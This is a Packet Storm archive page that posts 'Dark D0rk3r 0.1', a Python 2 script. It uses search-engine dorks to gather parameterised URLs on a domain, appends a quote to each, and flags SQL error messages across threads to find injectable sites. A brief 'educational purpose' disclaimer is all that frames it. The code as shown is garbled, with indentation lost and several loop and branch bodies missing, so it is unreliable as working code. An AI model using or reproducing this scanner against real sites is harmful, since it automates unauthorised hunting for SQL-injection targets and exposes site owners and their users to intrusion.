exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dark D0rk3r 0.1

Dark D0rk3r 0.1
Posted Jan 21, 2012
Authored by baltazar

Dark D0rk3r is a python script that performs dork searching and searches for SQL injection errors.

tags | tool, scanner, sql injection, python
systems | unix
SHA-256 | a9e3c9cd5b600302dcc1f2341952a583fc80d08ab62cdd2e46374d1c9e8bc466

Dark D0rk3r 0.1

Change Mirror Download
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : darkd0rk3r.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.1
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft and all members of ex darkc0de.com, ljuska.org

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
from random import choice

# Colours
W = "\033[0m";
R = "\033[31m";
G = "\033[32m";
O = "\033[33m";
B = "\033[34m";

# Banner
def logo():
print R+"\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2012 darkd0rk3r.py v.0.1 |"
print "| |"
print "|---------------------------------------------------------------|\n"
print W

if sys.platform == 'linux' or sys.platform == 'linux2':
subprocess.call("clear", shell=True)

subprocess.call("cls", shell=True)

log = "darkd0rk3r.txt"
logfile = open(log, "a")
threads = []
numthreads = 10
timeout = 10

sqlerrors = {'MySQL': 'error in your SQL syntax',
'MiscError': 'mysql_fetch',
'MiscError2': 'num_rows',
'Oracle': 'ORA-01756',
'JDBC_CFM': 'Error Executing Database Query',
'JDBC_CFM2': 'SQLServer JDBC Driver',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
'MS-Access_JETdb': 'Microsoft JET Database',
'Error' : 'Error Occurred While Processing Request',
'Error' : 'Server Error',
'Error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
'Error' : 'Invalid Querystring',
'Error' : 'OLE DB Provider for ODBC',
'Error' : 'VBScript Runtime',
'Error' : 'ADODB.Field',
'Error' : 'BOF or EOF',
'Error' : 'ADODB.Command',
'Error' : 'JET Database',
'Error' : 'mysql_fetch_array()',
'Error' : 'Syntax error',
'Error' : 'include()',
'Error' : 'mysql_numrows()',
'Error' : 'GetArray()',
'Error' : 'FetchRow()',
'Error' : 'Input string was not in a correct format'}

header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']

inurl = raw_input('Enter your dork: ')
site = raw_input('Enter domain: ')
maxc = 30

def search(inurl, maxc):
urls = []
counter = 0
while counter < int(maxc):
jar = cookielib.FileCookieJar("cookies")
query = inurl+'+site:'+site
results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(counter)+'&src=hmp'
request_web = urllib2.Request(results_web)
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
stringreg = re.compile('(?<=href=")(.*?)(?=")')
names = stringreg.findall(text)
counter += 1
for name in names:
if name not in urls:
if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
elif re.search("google",name) or re.search("youtube", name) or re.search("%", name):

tmplist = []
finallist = []
print "[+] URLS (unsorted): ",len(urls)
for url in urls:
host = url.split("/",3)
domain = host[2]
if domain not in tmplist and "=" in url:
print "[+] URLS (sorted): ",len(finallist)
return finallist

class injThread(threading.Thread):
def __init__(self,hosts):
self.hosts=hosts;self.fcount = 0
self.check = True

def run (self):
urls = list(self.hosts)
for url in urls:
if self.check == True:

def stop(self):
self.check = False

def ClassicINJ(url):
EXT = "'"
host = url+EXT
source = urllib2.urlopen(host).read()
for type,eMSG in sqlerrors.items():
if re.search(eMSG, source):
print R+"\nw00t!,w00t!:", O+host, B+"Error:", type


usearch = search(inurl,maxc)

menu = True
while menu == True:
print R+"\n[1] Injection Testing"
print "[0] Exit\n"
chce = raw_input(":")
if chce == '1':
print "\n[+] Preparing for SQLi scanning ..."
print "[+] Can take a while ..."
print "[!] Working ...\n"
i = len(usearch) / int(numthreads)
m = len(usearch) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = usearch[x*i:(x+1)*i]
if (z < m):
z += 1
thread = injThread(sliced)
for thread in threads:

if chce == '0':
print R+"\n[-] Exiting ..."
mnu = False

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By